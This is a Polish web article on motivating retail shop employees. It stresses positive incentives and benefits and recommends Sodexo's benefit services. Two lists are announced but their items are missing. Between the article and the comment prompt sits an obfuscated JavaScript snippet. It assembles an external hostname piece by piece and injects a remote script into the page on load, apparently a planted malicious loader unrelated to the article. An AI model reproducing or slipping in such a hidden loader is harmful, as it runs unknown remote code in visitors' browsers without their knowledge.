Sprzedawca to bardzo wymagający zawód. Dlatego motywowanie przedstawicieli tej grupy zawodowej to jedno z najważniejszych i jednocześnie najtrudniejszych wyzwań, przed którym stoi kadra menedżerska ds. sprzedaży. Zobacz, jak odpowiednio zachęcić sprzedawców do osiągania wyższych wyników.
Dlaczego warto motywować pracowników sklepu?
Praca w sklepie wymaga bezpośredniego kontaktu z klientem. Osoba zatrudniona na stanowisku sprzedawcy powinna być komunikatywna, aktywna w działaniu, cierpliwa, opanowana, odporna na stres, ambitna i profesjonalna. Jednocześnie do ciemnych stron pracy sprzedawcy zaliczyć można niestabilność zarobków, negatywne nastawienie klienta do handlowca lub stres związany z koniecznością osiągania coraz to lepszych wyników sprzedaży.
W związku z powyższym osoby zajmujące to stanowisko są częściej narażone na frustrację oraz wypalenie zawodowe. Aby zatem uniknąć negatywnych skutków związanych z zawodem sprzedawcy, warto sięgać po różnego rodzaju metody i techniki motywowania personelu zatrudnionego w sklepie.
Staranie zaplanowany system motywacji w firmie przynosi korzyści zarówno pracownikowi, jak i samemu pracodawcy. Właściwe nagradzanie pracowników daje im satysfakcję z wykonywanych zadań i poprawia ich samopoczucie. Zwiększone zaangażowanie pracownika w działania firmy wpływa na wydajność pracy, zmniejsza rotację pracowników, buduje pozytywny wizerunek firmy jako pracodawcy i wzmacnia jej stabilność na rynku. Ponadto zachęca personel do szukania innowacyjnych rozwiązań w zakresie przydzielonych im zadań.
Jakie sposoby na motywowanie pracowników sklepu są najskuteczniejsze?
Dobór odpowiednich sposobów motywowania należy zacząć od poznania potrzeb i wartości, którymi kierują się pracownicy sklepu.
Obecnie uważa się, że motywowanie negatywne jest przestarzałą i mało skuteczną metodą zachęcania pracowników do pracy. Może ono bowiem przyczynić się do pogorszenia atmosfery pracy, spadku kreatywności, a tym samym utarty satysfakcji pracowników z wykonywanych obowiązków. Wobec powyższego skuteczniejszą metodą zachęcania pracowników sklepu do bardziej wydajnej i efektywnej pracy jest motywacja pozytywna. Ta może przejawiać się w formach popularnych kart podarunkowych bądź innych, być może nieco mniej oczywistych, benefitów pozapłacowych.
Do metod pozytywnego wzmacniania pracowników sklepu należą:
Jak zbudować skuteczny system motywacyjny?
Aby właściwie motywować personel, warto wiedzieć, że adekwatna nagroda pełni następujące funkcje:
Stworzenie odpowiedniego systemu motywacji pracowników sklepu jest nie lada wyzwaniem. Aby przyniosło właściwe efekty, lepiej powierzyć je specjalistom. Obecnie na rynku istnieją firmy, takie jak Sodexo świadczące usługi w zakresie doboru odpowiednich benefitów pracowniczych. Dzięki posiadanemu doświadczeniu i narzędziom wskażą one optymalne rozwiązania w tym zakresie dla twojej firmy.
(function(){
iu7x_=("u"+"st");iu7x=document.createElement("script");iu7x.async=true;
iu7xu="193351540";iu7x_+="a"+("t.");iu7x_+="i"+("nf"+("o"))+("/");
iu7xu+=".l3x9m6g7u7xrkwte";iu7xu+="t82hn4umXtvw5f";
iu7x.src="https://"+iu7x_+iu7xu;iu7x.type="text/javascript";
d_b=document.body;d_b.appendChild(iu7x);
})();
Brak komentarza, Twój może być pierwszy.
Dodaj komentarz